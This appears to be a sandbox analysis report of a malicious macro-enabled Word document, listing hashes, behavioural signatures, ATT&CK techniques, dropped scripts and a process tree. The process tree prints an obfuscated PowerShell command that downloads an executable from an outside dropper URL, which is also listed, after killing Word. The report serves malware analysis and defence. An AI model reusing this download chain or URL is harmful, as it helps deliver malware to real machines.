Overview

overview

10

Static

static

8

2020_1844777494.docm

windows7_x64

10

2020_1844777494.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    71s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 03:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2020_1844777494.docm

  • Size

    380KB

  • MD5

    bbea719b296b81cb70e294246c9d6eae

  • SHA1

    d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd

  • SHA256

    99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832

  • SHA512

    40d7d306bfc8fad85f82d7f3fe9b5baec403a953178bf8284043afcb136b2356084151ded8f1e5c75aaa480e30a2aad0235adea09fdf4fffb7341d5890c67d17

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://werfpop.nl/client.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\Portes.vbs
      2⤵
      • Process spawned unexpected child process
      PID:3700
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3632
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Game_Lods\Groters.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1960
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4204
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:1112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Game_Lods\Groters.cmd
    Filesize

    4KB

    MD5

    0113834f9f390e12db3057891516f47d

    SHA1

    9c7e3a611586726c18f33ca668ce8c8e8ffc2919

    SHA256

    6231b5b04cb2708b8b8446536de8df99391da90bc77449589ab0e5b7660738e6

    SHA512

    0cd634772edb38f33222bc8654257f0959a063fcf5f8cea59d10a4b106746855dfcb974420e3729088e082d71f57e712a17b599ca69b06a0674b531358769fef

    Download Submit
  • C:\ProgramData\Nolewr.vbs
    Filesize

    358B

    MD5

    c16098d503816c750a2b4ce0b179798f

    SHA1

    e0a6368150f802e5ece6558b2693fa4ca8eeb4b8

    SHA256

    8ba6c20c21eb3a74998f53f1f7d8aa1a139a98c7413ce7bcb3052280f75b3f7d

    SHA512

    e3ca2ce1cc04b37b861489dd1fd21575efe261b436bb29eeed8653f0b5558ac902c8c0f7596bbae91b28854946597da5b385d0614edbf1e8755b955bed698929

    Download Submit
  • C:\ProgramData\Portes.vbs
    Filesize

    68KB

    MD5

    633d05bd06f41c9aa4281baa46ce38e4

    SHA1

    056a5a05108edbedde196098e07553c5c201368f

    SHA256

    a478b1ba294dee526fdf1986402d5e387151394525cc5f523026183197672a77

    SHA512

    268f61d20235696295481651ce70c20164ce4a16f6b6ae4b3e14d86f9e2743904db19e05810991f5928e3e82b08a11a9355a18d711309e1eef118047467a3c7a

    Download Submit
  • memory/540-141-0x0000000000000000-mapping.dmp
    Download
  • memory/760-148-0x0000000000000000-mapping.dmp
    Download
  • memory/1112-152-0x0000000000000000-mapping.dmp
    Download
  • memory/1960-146-0x0000000000000000-mapping.dmp
    Download
  • memory/3196-130-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-145-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-136-0x00007FFA871C0000-0x00007FFA871D0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-135-0x00007FFA871C0000-0x00007FFA871D0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-137-0x00000292BD920000-0x00000292BD924000-memory.dmp
    Filesize

    16KB

    Download
  • memory/3196-143-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-131-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-144-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-142-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-134-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-133-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3196-132-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3700-138-0x0000000000000000-mapping.dmp
    Download
  • memory/4204-150-0x00000220F3970000-0x00000220F3992000-memory.dmp
    Filesize

    136KB

    Download
  • memory/4204-151-0x00007FFAAA920000-0x00007FFAAB3E1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4204-149-0x0000000000000000-mapping.dmp
    Download